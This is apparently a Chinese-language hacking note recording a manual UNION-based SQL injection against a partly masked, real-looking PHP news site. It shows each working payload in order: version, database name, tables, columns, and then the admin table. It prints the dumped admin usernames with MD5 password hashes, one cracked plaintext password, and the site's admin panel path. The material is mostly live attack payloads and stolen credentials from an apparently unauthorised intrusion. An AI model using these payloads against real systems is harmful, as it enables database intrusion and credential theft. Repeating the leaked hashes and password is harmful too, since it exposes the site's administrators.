PHP手工注入

后台

www.c**bio.com/mywebmanage

 

 

查询版本

http://www/**yjt.com/show_news.php?id=1480 UNION SELECT 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16

 

5.1

 

数据库名

 

ttp://www/**yjt.com/show_news.php?id=1480UNION SELECT 1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16

ytw

 

查询表 

ttp://www/**yjt.com/show_news.php?id=1480 UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16 from information_schema. tables where table_schema=0x797477

ytw_admin,ytw_adminlog,ytw_news,ytw_newsclass,ytw_pic

ytw 转换成16等于     0x797477

 

查询列

ttp://www/**yjt.com/show_news.php?id=1480 UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16 from information_schema. columns where table_name=0x7974775F61646D696E

ID,Admin_admin,Admin_Password,Admin_username,Admin_Flag,Admin_Open,Admin_Count,Admin_IP,Admin_Time

 

查询账号密码

ttp://www/**yjt.com/show_news.php?id=1480 UNION SELECT 1,group_concat(Admin_admin,0x5c,Admin_Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from ytw_admin

 

0x5c   代表不用去换算16进制，如果不填就去转换下

wwwrree\da1864898daff10a7a936233d013cbb1,          admin\fb56fe7ffc84a325b7e4889174dde630,                  lwt\e10adc3949ba59abbe56e057f20f883e,

xjg\3d47b2b4e294a52c83abd9f3b50938b0,             zhc\b9920c557b557ab457ecdf407fbc2b98,                   wyx\e10adc3949ba59abbe56e057f20f883e,

zll\e10adc3949ba59abbe56e057f20f883e,                 pm\96e79218965eb72c92a549dd5a330112

 

密文：fb56fe7ffc84a325b7e4889174dde630

解密结果：hy510212